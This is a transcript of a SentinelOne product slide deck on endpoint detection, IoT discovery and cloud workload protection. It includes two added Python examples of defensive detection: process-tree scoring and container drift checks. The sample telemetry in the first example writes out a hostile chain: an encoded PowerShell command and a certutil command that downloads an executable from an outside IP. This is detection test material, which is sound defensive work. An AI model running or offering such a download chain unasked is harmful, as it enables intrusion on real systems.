Date post: 26-Mar-2021
SentinelOne Platform
Transcript
Page 1: SentinelOne Platform · 2021. 3. 9. · S1 Core Endpoint Protection 13 Unifies Prevention, Detection & Response Autonomous decisions + Automatic, instant responses Global Intel +

SentinelOne Platform

Page 2

Introduction

Page 3

©2020 SentinelOne, All Rights Reserved. 4

Platform overview (labels recovered from the diagram):

• Deep Visibility: Threat Hunting, Threat Intelligence
• Ranger IoT: Discovery & Control
• Endpoint: Automated ActiveEDR
• Kubernetes: Containerized Workloads
• Endpoint: AI Prevention
• Nexus: Integrations
• CloudFunnel: Data Lake Streaming
• Endpoint: Control
• XDR Response

Page 4

Agenda

Thanks for joining us today @ Tucana Cloud Event

• About SentinelOne

• Storyline & ActiveEDR

• Core - Control - Complete

• Ranger IoT

• Cloud Workload Security

• Vigilance MDR

• Management Portal Demo

Page 5

About SentinelOne

Page 6

Headquarters: Mountain View, CA

Global engineering: Israel, California, Boston, France

Global data centers: US, Frankfurt, Tokyo; AWS GovCloud

Highly available, global-ready architecture; global service & support

700+ employees

$1.1 billion market valuation

3,500+ customers

Global support: 24/7, follow the sun

Vigilance: 24/7 MDR team

Page 7

Clients, Awards & Testing

• 2019 Forbes AI 50: SentinelOne ranked #14 among America's Most Promising AI Companies

• 7th fastest-growing company in North America, and the only cybersecurity company in the top 10

• Compliance: in progress

Page 8

The Solution

Page 9

Storyline & ActiveEDR

Page 10

ActiveEDR: Autonomous Behavioral Scoring, Machine Speed Mitigation

Every device tells a set of stories. Each story is unique. Most stories are benign. Some are not. SentinelOne differentiates among thousands of stories in real time.

Storyline Process Tracking: each story is a rich set of branching related processes with a context all their own. The contents and arrangement of every Storyline is weighed in real time by ActiveEDR in order to identify when code execution has exceeded normal.

Modern Attack Velocity: when evil code remains unchecked the consequences are dire. This is especially true with high-velocity attacks.

Root Cause Analysis: root cause is critical to controlling the source of the problem. SentinelOne tracks the Storyline and ActiveEDR makes the judgement.

Machine Speed Remediation: the agent responds instantly to mitigate the threat. SentinelOne unauthorized change reversal, Windows rollback, and Kubernetes container kill remediate attacks.

The Stories Continue: surgical removal of out-of-bounds code keeps users working without delay.

Page 11

The Real Storyline & ActiveEDR


Page 12

S1 Core Endpoint Protection


Unifies Prevention, Detection & Response

✓ Autonomous decisions + Automatic, instant responses

✓ Global Intel + Static AI + Behavioral AI

✓ Full forensics & indicators. Easy pivot to EDR.

Protection Differentiators

✓ Holds up to high velocity & stealthy attacks

✓ Clean, simple management UX provides context

✓ Feature parity across OSes

Core · Control · Complete

Page 13

S1 Core Endpoint Recovery


Painless, fast attack recovery keeps users working

Recovery Differentiators

✓ Easy reversal of unauthorized changes

✓ One-click remediation & Windows rollback

✓ Device isolation & triage

✓ Less re-imaging. Less operational work.

Core · Control · Complete

Page 14

S1 Control

Adds security suite features to further support agent consolidation:

• Firewall for all OSes

• Bluetooth & BLE Control

• Full Remote Shell for all OSes

• USB Device Control

• Unpatched Apps

Core · Control · Complete

Page 15

S1 Complete EDR


Adds Deep Visibility™ Endpoint Detect & Respond

EDR Differentiators

✓ Combines enterprise features + ease-of-use

✓ Deeply coupled with Prevention enforcement

✓ MITRE ATT&CK™ technique searching

✓ ActiveEDR™ mark entire story as threat

✓ Built for massive data retention, scale, performance

Core · Control · Complete

Page 16

How It Works - Underlying Technology Flow

REAL TIME PREVENTION + REMEDIATION & RECOVERY (timeframe = seconds)

• Real Time File Analysis: AI-ML Static File Models

• Code Analysis: AI Dynamic Behavioral Models (ActiveEDR™)

• Automated Remediation: Kill & Quarantine; One-click Cleanup; One-click Rollback; Disconnect from Network; Local firewall control; Anti-tamper

DETECTION & RESPONSE (timeframe = 30 - 365+ days; data context is maintained for ease of use)

• Deep Visibility Response: Threat hunting / Watchlists; Fast queries, highly scalable; Single pivot storyline built with Storyline™; Mark entire story as threat; MITRE ATT&CK™ TTP hunt

Autonomous agent operation / not cloud reliant. High levels of feature parity for enterprise: Windows, Mac, Linux, Kubernetes clusters.
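The Storyline slide and the flow above describe the same mechanism from two angles: processes are grouped into a tree ("story") rooted at their common ancestor, each process is weighed in the context of its parent, and when the story as a whole crosses a line the entire story is marked as a threat, not just the one process that tripped a rule. The following is an added example written for this page, not SentinelOne's code: a toy correlator that builds stories from process-creation events, applies a few weighted behavioural heuristics, and returns every member pid of a story that scores at or above a threshold. The heuristic names, weights, threshold and the sample telemetry (pids, paths, command lines, the encoded PowerShell blob) are assumptions chosen for illustration.

```python
"""Added example (not SentinelOne code): a toy 'storyline' correlator.

Groups process-creation events into stories (process trees rooted at the
top-most observed ancestor), applies weighted behavioural heuristics to each
process in the context of its parent, sums the weights per story, and marks
the whole story when the total reaches a threshold. Heuristics, weights and
sample events are illustrative assumptions."""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str                      # executable path as reported by the sensor
    cmdline: str
    story_id: Optional[int] = None  # pid of the story root, set by correlate()


def _is(image: str, *names: str) -> bool:
    """Match on the basename so Windows and POSIX style paths both work."""
    base = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return base in names


# (name, weight, predicate(process, parent_or_None)); assumed values for illustration.
HEURISTICS = [
    ("office_spawns_shell", 0.6,
     lambda p, par: par is not None and _is(par.image, "winword.exe", "excel.exe")
     and _is(p.image, "cmd.exe", "powershell.exe")),
    ("encoded_powershell", 0.5,
     lambda p, par: _is(p.image, "powershell.exe") and " -enc" in p.cmdline.lower()),
    ("lolbin_download", 0.4,
     lambda p, par: _is(p.image, "certutil.exe", "bitsadmin.exe") and "http" in p.cmdline.lower()),
]
THRESHOLD = 1.0  # a story scoring at or above this is marked as a threat


def correlate(events: List[ProcEvent]) -> Dict[int, ProcEvent]:
    """Assign every event to a story: follow ppid links up to the top-most
    ancestor present in the event set and use that pid as the story id."""
    by_pid = {e.pid: e for e in events}
    for e in events:
        cur = e
        while cur.ppid in by_pid and cur.ppid != cur.pid:
            cur = by_pid[cur.ppid]
        e.story_id = cur.pid
    return by_pid


def score_stories(events: List[ProcEvent]):
    """Evaluate each process against its parent and accumulate per story."""
    by_pid = correlate(events)
    scores: Dict[int, float] = defaultdict(float)
    hits: Dict[int, list] = defaultdict(list)
    for e in events:
        parent = by_pid.get(e.ppid)
        for name, weight, pred in HEURISTICS:
            if pred(e, parent):
                scores[e.story_id] += weight
                hits[e.story_id].append((e.pid, name))
    return scores, hits


def threat_stories(events: List[ProcEvent]) -> Dict[int, dict]:
    """Return every story that reaches THRESHOLD together with all of its
    member pids, so the whole tree can be mitigated in one action."""
    scores, hits = score_stories(events)
    return {
        sid: {
            "score": round(score, 2),
            "hits": hits[sid],
            "pids": sorted(e.pid for e in events if e.story_id == sid),
        }
        for sid, score in scores.items() if score >= THRESHOLD
    }


def sample_events() -> List[ProcEvent]:
    """Constructed telemetry: a benign service tree plus a phishing-style chain."""
    enc = "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"  # made-up encoded command fragment
    return [
        ProcEvent(1, 0, r"C:\Windows\System32\services.exe", "services.exe"),
        ProcEvent(50, 1, r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
        ProcEvent(100, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
        ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\WINWORD.EXE", "WINWORD.EXE invoice.docm"),
        ProcEvent(300, 200, r"C:\Windows\System32\cmd.exe", "cmd.exe /c powershell -enc " + enc),
        ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                  "powershell -enc " + enc),
        ProcEvent(500, 400, r"C:\Windows\System32\certutil.exe",
                  "certutil -urlcache -f http://203.0.113.7/p.exe p.exe"),
    ]


if __name__ == "__main__":
    for sid, story in threat_stories(sample_events()).items():
        print(f"story {sid}: score={story['score']} hits={story['hits']} pids={story['pids']}")
```

Two points the example makes concrete: no single process in the chain is damning on its own (a shell under Word is suspicious, not conclusive), so scoring has to live at the story level; and because every pid carries its story id, "mark entire story as threat" is a lookup rather than a second investigation. A real sensor keys on process GUIDs rather than reusable pids and has to cope with parents that exited before the sensor saw them.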

Page 17

Ranger IoT

Page 18

IoT Discovery & Control

Ranger IoT

S1 Ranger IoT discovers & fingerprints every device on your network

✓ Instant Asset Inventory

✓ Eliminate IoT Blind Spots

✓ One-click Rogue Protection

✓ No network changes

Page 19

Cloud Workload Security

Page 20

Cloud Security Challenges

Complex. Manual. Reactive. Expensive.

Too Many Blind Spots: speed and scale of change renders manual security methods moot

Too Many Bottlenecks: self-organizing scrum teams working outside of centralized governance

Too Few Experts: the skills, tools and methods for on-prem don't work well for cloud

Too Much Noise: raw, uncorrelated data streams don't help analysts control problems

Too Many Tools: overlapping functions create operational difficulties and expense

Page 21


Distributed. Autonomous. Automated.

Endpoint IoT Cloud

Page 22

Securing Workloads - No Matter Their Location: Hybrid Cloud VMs and Containers

Complete Host OS Protection

▪ 10 major Linux distributions and 12 years of Windows Server

▪ Cloud-native Kubernetes managed containers / Docker

▪ AI-powered runtime protection and remediation

▪ Application Control

Enterprise-grade EDR

▪ Runtime detection and response at VM and container level

▪ Patented Storyline™ accelerates incident response

▪ Fully equipped remote shell

Enterprise Management & Deployment

▪ Automated deployment and scalability

▪ ONE multi-cloud, multi-tenant console

Cloud Security Posture Management (1H-2021)

▪ CIS Benchmarks for Workloads and Cloud Services

▪ Cloud Asset Inventory / Compliance Reporting

▪ Visual Investigation / File Integrity Monitoring Reports

Page 23

Runtime Security: Linux VMs

Autonomous, consolidated EPP

▪ One agent

▪ Max stability, agility / no kernel modules

EPP functions on-agent

▪ Static AI real-time prevention

▪ Behavioral AI detects fileless attacks

Accelerated Threat Resolution

▪ Storyline™ auto-correlates to MITRE

▪ ActiveEDR™ hunting

▪ Remote forensics via a fully capable remote shell

▪ Kill, quarantine, file fetch, network isolate

Automated Application Control

Supports 10 Major Linux Distros

▪ Ubuntu

▪ RHEL

▪ CentOS

▪ Amazon Linux 2

▪ Oracle

▪ SUSE Linux Enterprise Server

▪ Fedora

▪ Debian

▪ Virtuozzo

▪ Scientific Linux

Page 24

Runtime Security: Windows Server VMs

Supports Years of Releases

▪ Windows Server 2019, 2016, 2012 R2, 2012, 2008 R2 SP1

▪ Windows Server Core 2019, 2016, 2012

▪ Windows Storage Server 2016, 2012 R2, 2012

2020 MITRE ATT&CK Coverage

▪ Fewest Misses

▪ Most Correlations

▪ Best Data Enrichment

Consolidated EPP functions on-agent

▪ One agent

▪ Static AI real-time prevention

▪ Behavioral AI detects fileless attacks

Accelerated Threat Resolution

▪ Storyline™ auto-correlates to MITRE

▪ ActiveEDR™ hunting

▪ Secure remote full PowerShell

▪ Patented 1-Click Remediation & Rollback

Page 25

Container Security: Kubernetes Sentinel

Enterprise-grade EPP+EDR in one

▪ Real-time container protection w/o interference

▪ Runtime protection vs. malware, unknown, and fileless attacks

▪ ActiveEDR™ visibility & hunting inside containers

▪ Kill and quarantine threats, let k8s respawn affected containers

▪ Full remote shell into pods

Automated Application Control

▪ No allow lists or ML training required

Consolidated EPP functions on-agent

▪ 1 agent per worker node

▪ No pod instrumentation

▪ Auto-deploy via Helm; auto-scale as a DaemonSet

Page 26

Storyline™ Connects the Dots Automatically

• Distributed intelligence drives high-velocity, instantaneous protection

• Patented, real-time, machine-built context across all major OSes & cloud workloads

• Long time horizon EDR data retention for proactive custom queries, MITRE technique hunting, IR, or any EDR activity

• 1-Click recovery & response reverses unauthorized changes across the fleet

Page 27

Cloud Metadata within S1 Console

Ex: EC2 instance deployed as an EKS worker node.

Review VM and K8s metadata tags

▪ IDs for machine image, VPC, and more

▪ K8s cluster name, worker node name, labels

Group instances according to tags...

▪ account ID

▪ AMI ID

▪ etc.

...and manage groups

▪ apply different policies

▪ monitor resource usage

Page 28

Application Control (available with Control and Complete)

Immutable Cloud Workloads

▪ Any executable running in the app is in the image

▪ Runtime security depends upon immutability

Application Control Engine

▪ Detects any foreign processes which impair the immutable state of the workload

Workloads Protected at Onset

▪ NO pre-deployment scanning needed

▪ NO ML training period needed

▪ NO allow list maintenance needed

App Control for Containers: AVAILABLE NOW

App Control for VMs: COMING SOON (Linux VMs, Windows Servers)
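The Kubernetes Sentinel slide says "no allow lists or ML training required", and this slide explains why: for an immutable workload the image itself is the allow list, so the engine only has to notice executables that are not in the image or no longer match it. The following is an added example written for this page, not SentinelOne's engine: it derives a path-to-digest manifest from a (constructed) image, then classifies runtime process observations as allowed, foreign (not in the image at all) or modified (in the image, but the bytes differ). The image contents, paths and process observations are made-up stand-ins for real binaries.

```python
"""Added example (not SentinelOne code): application control for an
immutable workload. The allow list is derived from the image (path -> SHA-256)
rather than hand-maintained or learned; at runtime every process is checked
against it and anything not in the image, or whose bytes no longer match,
is reported as drift. Image contents and observations are constructed."""
import hashlib
from typing import Dict, List, Tuple

# Constructed image contents: path -> file bytes (placeholders for real ELF binaries).
IMAGE_FILES: Dict[str, bytes] = {
    "/usr/local/bin/app": b"ELF app build 1",
    "/bin/sh": b"ELF sh",
    "/usr/bin/curl": b"ELF curl",
}


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def image_manifest(files: Dict[str, bytes]) -> Dict[str, str]:
    """The image is the allow list: record each executable's digest at build time."""
    return {path: sha256(content) for path, content in files.items()}


def classify(manifest: Dict[str, str], proc: dict) -> str:
    """proc carries the executable path and the bytes actually mapped at runtime."""
    exe, digest = proc["exe"], sha256(proc["bytes"])
    if exe not in manifest:
        return "foreign_executable"    # dropped in after deployment, e.g. under /tmp
    if manifest[exe] != digest:
        return "modified_executable"   # a shipped binary was altered in place
    return "allowed"


def detect_drift(manifest: Dict[str, str], procs: List[dict]) -> List[Tuple[int, str, str]]:
    """Return (pid, exe, verdict) for every process that breaks immutability."""
    findings = []
    for p in procs:
        verdict = classify(manifest, p)
        if verdict != "allowed":
            findings.append((p["pid"], p["exe"], verdict))
    return findings


def sample_runtime() -> List[dict]:
    """Constructed process observations from the running container."""
    return [
        {"pid": 1, "exe": "/usr/local/bin/app", "bytes": b"ELF app build 1"},
        {"pid": 7, "exe": "/bin/sh", "bytes": b"ELF sh"},
        {"pid": 42, "exe": "/tmp/xmrig", "bytes": b"ELF miner"},
        {"pid": 43, "exe": "/usr/bin/curl", "bytes": b"ELF curl + implant"},
    ]


if __name__ == "__main__":
    manifest = image_manifest(IMAGE_FILES)
    for pid, exe, verdict in detect_drift(manifest, sample_runtime()):
        print(f"pid {pid} {exe}: {verdict}")
```

The check is only as good as the immutability assumption: a writable volume mounted into the container, or a workload that legitimately compiles or downloads code at runtime, will generate findings that are drift by definition but not attacks, so those workloads need a different control. Checking the digest and not just the path is what catches the second case in the sample, where a binary that is in the image has been overwritten.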

Page 29

CIS Benchmarks

Misconfigured IaaS services remain the #1 cause of cloud security failures. CIS Benchmarks represent the gold standard for configuration security.

Page 30

CUSTOMERS ARE OUR #1

• 97% would recommend S1: "Highest rated EDR vendor in Voice of the Customer report for EDR" (May 2020)

• Customer Satisfaction (CSAT) is ~97%

• Net Promoter Score in the "great" to "excellent" range

Page 31

Customer Case Studies: Securing Cloud Workloads at Scale (K8s Agent, Linux Agent)

One Console

▪ Thousands of user endpoints...

▪ ...Hundreds of Linux VMs

▪ Intuitive hybrid cloud mgmt, no additional headcount

Max Agility

▪ Accelerating k8s, 100's Linux builds daily

▪ Auto-deploy, scale K8s Sentinel

▪ GO FAST and SECURE

Cloud Runtime

▪ Info Services Enterprise needed to secure cloud VMs and EKS

▪ EZ deploy: ~1k / couple hours

▪ No kernel modules, max stability

Page 32

Summary

Distributed Intelligence: scales people with edge-to-cloud AI

Purpose-Built for Enterprises: offers deep capabilities for demanding teams

Simplified Experience: consolidates controls to reduce complexity

Fast Threat Resolution: accelerates recovery to real time

Page 33

Vigilance MDR

Page 34

SOC Augmentation Service

Vigilance extends your in-house SOC expertise and provides a second set of eyes.

• 24/7 Global Coverage

• Human Element, Human Service

• Peace of Mind

• Fewer Alerts, More Context

Page 35

Thank You

